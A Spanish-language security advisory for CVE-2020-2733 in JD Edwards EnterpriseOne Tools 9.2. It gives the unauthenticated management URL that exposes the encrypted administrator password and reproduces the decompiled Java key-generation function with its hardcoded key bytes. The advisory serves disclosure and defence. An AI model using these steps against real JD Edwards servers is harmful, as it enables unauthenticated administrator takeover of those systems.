
Imagen 1: Descifrar la cadena
Imagen 2: Descifrar proporcionando la URL
Aplicación: JD Edwards EnterpriseOne Tools
Versiones afectadas: JD Edwards EnterpriseOne Tools 9.2
URL del proveedor: https://oracle.com/
Fallo: Divulgación de información
Reportado: 18 de septiembre de 2019
Fecha del aviso público: 23 de agosto de 2022
Referencia: [https://www.oracle.com/security-alerts/cpuapr2020.html, https://redrays.io/cve-2020-2733-jd-edwards/]
Plantilla de Nuclei para detección: https://github.com/projectdiscovery/nuclei-templates/blob/68f0ad5fa2f54a08959e2d68633174750fcb4952/http/cves/2020/CVE-2020-2733.yaml#L2
INFORMACIÓN DEL AVISO
Título: [CVE-2020-2733] La contraseña de administrador de JD Edwards EnterpriseOne Tools no está protegida adecuadamente
Riesgo: Crítico
URL del aviso: https://redrays.io/cve-2020-6369-patch-bypass/
Fecha de publicación: 23.08.2022
Explotable de forma remota: Sí
Explotable localmente: No
Información CVSS: Puntuación base CVSS v3.1: 9.8 / 10 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
JD Edwards EnterpriseOne Tools 9.2 o versiones inferiores permiten a atacantes no autenticados omitir la autenticación y obtener derechos de administrador en el sistema.
La vulnerabilidad fue descubierta en el portal de gestión de Oracle JD Edwards. Para reproducir la vulnerabilidad, es necesario abrir (sin autenticación) la siguiente URL
http://JDEdwards:8999/manage/fileDownloader?sec=1
Al abrir la URL, se puede ver texto pseudoaleatorio en la página.

ACHCJKGJHCJKBLLALOLOJFCABEFHOALDDAOFNGGANPDB
Después de analizar los archivos jar de JD Edwards, descubrimos que estos datos pseudoaleatorios son: ¡LA CONTRASEÑA DE ADMINISTRADOR CIFRADA!
Las claves de cifrado se encuentran en la siguiente función
private static void genKeys(byte[] paramArrayOfByte1, byte[] paramArrayOfByte2, byte paramByte)
{
int i = 0;
byte[] arrayOfByte1 = { 65, 4, 95, 12, 88, 41, 6, 114, 119, 93, 37, 68, 75, 19, 49, 46 };
byte[] arrayOfByte2 = { 107, 34, 26, 94, 68, 41, 119, 48, 3, 88, 28, 97, 5, Byte.MAX_VALUE, 77, 54 };
byte[] arrayOfByte3 = { 36, 89, 113, 109, 38, 15, 7, 66, 76, 115, 16, 53, 106, 94, 27, 56 };
int j = paramByte >> 4;
int k = paramByte & 0xF;
int m = arrayOfByte3[j];
for (i = 0; i < 16; i++) {
paramArrayOfByte1[i] = ((byte)(arrayOfByte1[i] ^ m));
}
m = arrayOfByte3[k];
for (i = 0; i < 16; i++) {
paramArrayOfByte2[i] = ((byte)(arrayOfByte2[i] ^ m));
}
}
Como resultado, obtendrá la contraseña de administrador y podrá implementar cualquier aplicación en el portal de JD Edwards.

Referencia/Crédito: https://redrays.io/blog/cve-2020-2733-jd-edwards/